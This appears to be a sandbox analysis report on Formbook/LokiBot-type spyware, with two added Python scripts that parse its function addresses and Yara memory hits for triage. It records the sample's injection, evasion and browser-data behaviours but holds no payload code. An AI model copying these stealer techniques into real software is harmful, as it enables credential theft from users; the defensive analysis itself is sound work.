Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED759D0 NtOpenThread,17_2_1ED759D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75950 NtOpenProcess,17_2_1ED75950
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75960 NtOpenProcessToken,17_2_1ED75960
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED754E0 NtEnumerateValueKey,17_2_1ED754E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED754B0 NtEnumerateKey,17_2_1ED754B0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED755E0 NtGetContextThread,17_2_1ED755E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75270 NtCreateProcessEx,17_2_1ED75270
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75210 NtCreateMutant,17_2_1ED75210
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED75090 NtClose,17_2_1ED75090
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED751D0 NtCreateKey,17_2_1ED751D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76660 NtWriteVirtualMemory,17_2_1ED76660
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76630 NtWriteFile,17_2_1ED76630
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED765E0 NtWaitForSingleObject,17_2_1ED765E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED76200 NtSetInformationFile,17_2_1ED76200
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED763D0 NtSetValueKey,17_2_1ED763D0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015A414 NtProtectVirtualMemory,17_2_0015A414
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00150504 NtSetInformationThread,NtProtectVirtualMemory,17_2_00150504
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015A8D2 NtSetInformationThread,17_2_0015A8D2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00154BDA NtAllocateVirtualMemory,17_2_00154BDA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00150511 NtSetInformationThread,17_2_00150511
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015050D NtSetInformationThread,17_2_0015050D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015A52A NtProtectVirtualMemory,17_2_0015A52A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015A8E0 NtSetInformationThread,17_2_0015A8E0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00150DE0 NtProtectVirtualMemory,17_2_00150DE0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_00150EF0 NtProtectVirtualMemory,17_2_00150EF0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_0015B2C5 NtSetInformationThread,17_2_0015B2C5
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF190717_2_1EDF1907
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED496B917_2_1ED496B9
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED636AC17_2_1ED636AC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED877C817_2_1ED877C8
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED8B59417_2_1ED8B594
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5153A17_2_1ED5153A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED972C317_2_1ED972C3
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED3F20217_2_1ED3F202
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED630CF17_2_1ED630CF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDFB0E717_2_1EDFB0E7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF50A517_2_1EDF50A5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDEB04D17_2_1EDEB04D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED3707817_2_1ED37078
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED8701517_2_1ED87015
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED591F717_2_1ED591F7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5310917_2_1ED53109
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED4EEC717_2_1ED4EEC7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDAAEF517_2_1EDAAEF5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDE2EBA17_2_1EDE2EBA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED40E5217_2_1ED40E52
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED62CAF17_2_1ED62CAF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDDADC517_2_1EDDADC5
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED82ADC17_2_1ED82ADC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED50BFB17_2_1ED50BFB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF4BBA17_2_1EDF4BBA
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED3CBA717_2_1ED3CBA7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDDEB7D17_2_1EDDEB7D
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDDC88917_2_1EDDC889
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDAC88017_2_1EDAC880
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED628A317_2_1ED628A3
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF88A217_2_1EDF88A2
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED829EE17_2_1ED829EE
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EE0499017_2_1EE04990
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED6473617_2_1ED64736
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5E4D717_2_1ED5E4D7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED344FC17_2_1ED344FC
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED924E117_2_1ED924E1
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED8645A17_2_1ED8645A
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED5C44717_2_1ED5C447
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EE0040417_2_1EE00404
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED625CB17_2_1ED625CB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDE851617_2_1EDE8516
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF650017_2_1EDF6500
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1EDF225017_2_1EDF2250
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED383EB17_2_1ED383EB
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exeCode function: 17_2_1ED620EA17_2_1ED620EA
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EB93D00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EFBF3E2 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EF72824 appears 112 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EB81ACE appears 88 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EF72F3C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1ED63D00 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1ED4F63B appears 256 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EF41ACE appears 132 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1ED772D0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EF53D00 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EF3F63B appears 254 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EDCF3E2 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1ED82F3C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1ED51ACE appears 133 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EF672D0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EBB2824 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EBFF3E2 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1EB7F63B appears 188 times
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: String function: 1ED82824 appears 113 times
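The two function lists above are one body of code seen twice: every address reported for process index 7 reappears for process index 17 exactly 0x1F0000 lower (7_2_1EFCEB7D and 17_2_1EDDEB7D, 7_2_1EF528A3 and 17_2_1ED628A3, and so on), and the string functions show the same pattern (1EB93D00, 1ED63D00 and 1EF53D00 differ only in their upper bits, as do 1EB7F63B, 1ED4F63B and 1EF3F63B). That is what an injected or self-mapped image looks like when each process instance places it at a different base, and it means one pass of reverse engineering covers every instance. The script below is an added example and not part of the Joe Sandbox report: it parses rows in the report's "Code function" form, lets address pairs vote on the constant shift between two process indices, and reports how many functions line up under the winning shift. The rows it embeds are transcribed from this page, and the page-alignment assumption (only pairs whose low 12 bits agree may vote) is this example's own choice.

```python
import re
from collections import Counter, defaultdict

# Rows transcribed from the report's "Code function" table for process indices
# 7 and 17 (constructed input for this example). Three extra process-17 functions
# without a process-7 counterpart are included to show a partial match.
REPORT_ROWS = ["Code function: " + fid for fid in (
    "7_2_1EFCEB7D 7_2_1EF528A3 7_2_1EFE88A2 7_2_1EFCC889 7_2_1EF729EE 7_2_1EFF4990 "
    "7_2_1EF54736 7_2_1EF244FC 7_2_1EF824E1 7_2_1EF4E4D7 7_2_1EF7645A 7_2_1EF4C447 "
    "7_2_1EFF0404 7_2_1EF525CB 7_2_1EFD8516 7_2_1EFE6500 7_2_1EFE2250 7_2_1EF283EB "
    "7_2_1EF520EA "
    "17_2_1EDDEB7D 17_2_1ED628A3 17_2_1EDF88A2 17_2_1EDDC889 17_2_1ED829EE 17_2_1EE04990 "
    "17_2_1ED64736 17_2_1ED344FC 17_2_1ED924E1 17_2_1ED5E4D7 17_2_1ED8645A 17_2_1ED5C447 "
    "17_2_1EE00404 17_2_1ED625CB 17_2_1EDE8516 17_2_1EDF6500 17_2_1EDF2250 17_2_1ED383EB "
    "17_2_1ED620EA 17_2_1ED5DFD4 17_2_1EDA1FDB 17_2_1ED39F90"
).split()]

# <process index>_<run index>_<address>; no word boundary on purpose so that the
# doubled id produced by the page extraction ("7_2_1EFCEB7D7_2_1EFCEB7D") still parses.
FUNC_ID = re.compile(r"(\d+)_(\d+)_([0-9A-Fa-f]{8})")


def parse_functions(rows):
    """Group function start addresses by process index; sets absorb duplicates."""
    by_proc = defaultdict(set)
    for row in rows:
        for proc, _run, addr in FUNC_ID.findall(row):
            by_proc[int(proc)].add(int(addr, 16))
    return dict(by_proc)


def best_rebase_delta(addrs_a, addrs_b):
    """Find the constant shift that maps the most functions of A onto B.

    Assumption: the code is mapped on page boundaries, so two loads of the same
    image differ by a multiple of 0x1000 and only pairs whose low 12 bits agree
    are allowed to vote. Returns (delta, matched), or (None, 0) when nothing lines up.
    """
    votes = Counter()
    for a in addrs_a:
        for b in addrs_b:
            if (a & 0xFFF) == (b & 0xFFF):
                votes[a - b] += 1
    if not votes:
        return None, 0
    delta = votes.most_common(1)[0][0]
    matched = sum(1 for a in addrs_a if a - delta in addrs_b)
    return delta, matched


def rebase_report(by_proc, reference):
    """For each other process index: how much of the reference process's function
    set reappears at a constant shift (same image, different load address)."""
    ref = by_proc[reference]
    out = {}
    for proc, addrs in by_proc.items():
        if proc == reference:
            continue
        delta, matched = best_rebase_delta(ref, addrs)
        out[proc] = {"delta": delta, "matched": matched, "of": len(ref)}
    return out


if __name__ == "__main__":
    by_proc = parse_functions(REPORT_ROWS)
    for proc, r in rebase_report(by_proc, reference=7).items():
        shift = "n/a" if r["delta"] is None else f"0x{r['delta']:X}"
        print(f"process 7 -> process {proc}: shift {shift}, "
              f"{r['matched']}/{r['of']} functions line up")
```

When the match ratio is high but below 100%, the leftover functions are usually code that only ran (and was therefore only discovered by the sandbox's dynamic coverage) in one of the instances, not a different image; a ratio near zero means the two process indices hold different code and need separate analysis.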
PE file contains strange resources
Source: ___ __ ___.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: ___ __ ___.exe, 00000000.00000002.959022514.003D0000.00000008.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000000.00000002.959317956.00426000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTJENESTE.exe vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000003.966535726.007BC000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameTJENESTE.exen vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000002.968639132.01486000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameTJENESTE.exe vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000002.967922744.00360000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000002.968324811.00740000.00000008.00000001.sdmp | Binary or memory string: originalfilename vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000002.968324811.00740000.00000008.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs ___ __ ___.exe
Source: ___ __ ___.exe, 00000001.00000002.1024691339.1DA00000.00000008.00000001.sdmp | Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs ___ __ ___.exe
Source: ___ __ ___.exe | Binary or memory string: OriginalFilenameTJENESTE.exe vs ___ __ ___.exe
Searches the installation path of Mozilla Firefox
Source: C:\Windows\System32\msiexec.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install Directory
Tries to load missing DLLs
Source: C:\Windows\System32\msiexec.exe | Section loaded: mozglue.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: winsqlite3.dll
Yara signature match
Source: 00000013.00000002.1409626473.003DF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1439121827.006C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1438365388.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1410061454.00D60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.1162285538.1DB00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
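Each Yara row names a memory dump by a dotted identifier. The first field is the process index in hex (00000011 is process 17, the same index the "Code function" rows use, and 00000013 is process 19), the fourth looks like the region's base address, and the fifth reads as the Win32 page protection: 00000040 (PAGE_EXECUTE_READWRITE) on every Formbook hit, 00000004 (PAGE_READWRITE) on the LokiBot dropper hit, which is a packed-dropper signature firing on data rather than a decoded payload. Two rules on the same dump are one finding, not two. The script below is an added example and not part of the report: it parses rows in this form, groups hits by (process, region) so that each region counts once, and lists the executable regions, which are the dumps to pull first for unpacking. The reading of the identifier's fourth and fifth fields is this example's own assumption, and the rows it embeds are transcribed from this page with the rule metadata shortened.

```python
import re
from collections import defaultdict

# Yara rows transcribed from the report (constructed input; metadata shortened).
REPORT_ROWS = [
    "Source: 00000013.00000002.1409626473.003DF000.00000004.00000001.sdmp, type: MEMORY | "
    "Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, author = Florian Roth",
    "Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY | "
    "Matched rule: Formbook author = JPCERT/CC Incident Response Group",
    "Source: 00000007.00000002.1159029290.00030000.00000040.00000001.sdmp, type: MEMORY | "
    "Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein",
    "Source: 00000005.00000002.1133249944.00030000.00000040.00000001.sdmp, type: MEMORY | "
    "Matched rule: Formbook author = JPCERT/CC Incident Response Group",
    "Source: 00000005.00000002.1133299264.00060000.00000040.00000001.sdmp, type: MEMORY | "
    "Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein",
    "Source: 00000008.00000000.1108604549.06460000.00000040.00000001.sdmp, type: MEMORY | "
    "Matched rule: Formbook author = JPCERT/CC Incident Response Group",
]

# Field meaning is this example's reading of the dump name, not a documented
# format: process index, run index, dump sequence number, region base address,
# page protection, region type flag.
SDMP_ID = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<run>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-F]{8})\.(?P<prot>[0-9A-F]{8})\.(?P<kind>[0-9A-F]{8})\.sdmp"
)
RULE_NAME = re.compile(r"Matched rule:\s*([A-Za-z0-9_]+)")

# Win32 PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY.
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80


def parse_yara_rows(rows):
    """One dict per row: process index, region base, protection, rule name."""
    hits = []
    for row in rows:
        dump = SDMP_ID.search(row)
        rule = RULE_NAME.search(row)
        if not (dump and rule):
            continue
        hits.append({
            "proc": int(dump["proc"], 16),
            "base": int(dump["base"], 16),
            "prot": int(dump["prot"], 16),
            "rule": rule.group(1),
        })
    return hits


def group_by_region(hits):
    """(process index, region base) -> sorted rule names; one entry per region."""
    regions = defaultdict(set)
    for h in hits:
        regions[(h["proc"], h["base"])].add(h["rule"])
    return {k: sorted(v) for k, v in regions.items()}


def executable_regions(hits):
    """Regions whose protection carries an execute bit: where a decoded payload
    was actually runnable, so the first dumps to carve for unpacking."""
    return sorted({(h["proc"], h["base"]) for h in hits if h["prot"] & EXECUTE_MASK})


if __name__ == "__main__":
    hits = parse_yara_rows(REPORT_ROWS)
    for (proc, base), rules in sorted(group_by_region(hits).items()):
        print(f"process {proc:2d} region 0x{base:08X}: {', '.join(rules)}")
    print("executable:", [f"{p}:0x{b:08X}" for p, b in executable_regions(hits)])
```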
Classification label
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@27/13@19/2
Creates files inside the program directory
Source: C:\Windows\explorer.exe | File created: C:\Program Files\Rutf
Creates files inside the user directory
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CTD93KMK.txt
Creates temporary files
Source: C:\Users\user\Desktop\___ __ ___.exe | File created: C:\Users\user\AppData\Local\Temp\subfolder1
Executes visual basic scripts
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs'
Found command line output
Source: C:\Windows\System32\cmd.exe | Console Write: ......................0.............T...;.......................................!...@@ .....7%.M........z....F.J....l...
Source: C:\Windows\System32\cmd.exe | Console Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........T....n@.....V..J............T.......#..u(...&...`.....,.....
PE file has an executable .text section and no other executable section
Source: ___ __ ___.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application are using VB runtime library 6.0 (probably coded in Visual Basic)
Source: C:\Users\user\Desktop\___ __ ___.exe | Section loaded: C:\Windows\System32\msvbvm60.dll
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Section loaded: C:\Windows\System32\msvbvm60.dll
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Section loaded: C:\Windows\System32\msvbvm60.dll
Source: C:\Program Files\Rutf\IconCache-ze.exe | Section loaded: C:\Windows\System32\msvbvm60.dll
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Section loaded: C:\Windows\System32\msvbvm60.dll
Reads ini files
Source: C:\Users\user\Desktop\___ __ ___.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\___ __ ___.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\msiexec.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: ___ __ ___.exe | Virustotal: Detection: 20%
Source: ___ __ ___.exe | ReversingLabs: Detection: 34%
Sample reads its own file content
Source: C:\Users\user\Desktop\___ __ ___.exe | File read: C:\Users\user\Desktop\___ __ ___.exe
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\___ __ ___.exe 'C:\Users\user\Desktop\___ __ ___.exe'
